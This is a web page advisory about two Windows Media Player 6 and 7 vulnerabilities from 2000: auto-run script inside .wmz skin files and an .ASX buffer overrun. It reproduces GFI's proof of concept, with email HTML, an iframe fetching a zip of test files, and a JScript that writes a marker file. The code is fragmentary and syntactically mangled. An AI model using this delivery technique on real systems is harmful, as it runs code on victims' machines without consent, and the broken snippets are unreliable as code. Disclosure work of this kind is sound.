Skip navigation

Multiple Vulnerabilities in Windows Media Player

Reported November 23, 2000 by @Stake and GFI

  • Windows Media Player 7
  • Windows Media Player 6


Two vulnerabilities in Microsoft Windows Media Player have been discovered.  The first vulnerability allows the execution of arbitrary code.  By embedding a javascript (.js) file within a Media Player skin file (.wmz) a malicious user can cause media player to automatically run the code.  Media Player does not prompt users before running code that appears to be Media Player files.

The second vulnerability is a buffer overrun.  The problem lies in how Media Player deals with the .ASX file format.  This vulnerability can allow the execution of arbitrary code.


The following demonstration for the first vulnerability was provided GFI;

----\[Proof of concept Exploit:

<Embedded within an HTML file or e-mail>

E-mail Example 1.

<script language="JavaScript">
function MM_openBrWindow(theURL,winName,features) \{ //v2.0
alert('This exploit will now open a new window\n
and automatically download the wmd file\n
and execute it. This will create a file named\n
gfiseclab.txt in your C:\\');,winName,features);
<body bgcolor="#FFFFFF"
</Embedded within an HTML e-mail>

E-mail Example 2.

alert('This exploit will now open a new window \n and automatically download
the wmd file \n
and execute it. This will create a file named \n gfiseclab.txt in your
<iframe src="http://website/test.wmd"></iframe></body>

test.wmd is a compressed zip file which contains the following files:

* test.asx: meta file which points to an mpg file and the exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.

test.wmz is also a compressed zip file containing:

* test.js: our javascript which contains the following code


var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload()\{


* test.wms: another metafile which calls test.js


The second vulnerability proof of concept was provided by @Stake


Microsoft has released a security bulletin, MS00-090 and patches to repair the vulnerability.

Windows Media Player 6.4:

Windows Media Player 7:

Discovered by
@Stake and GFI

Hide comments


  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.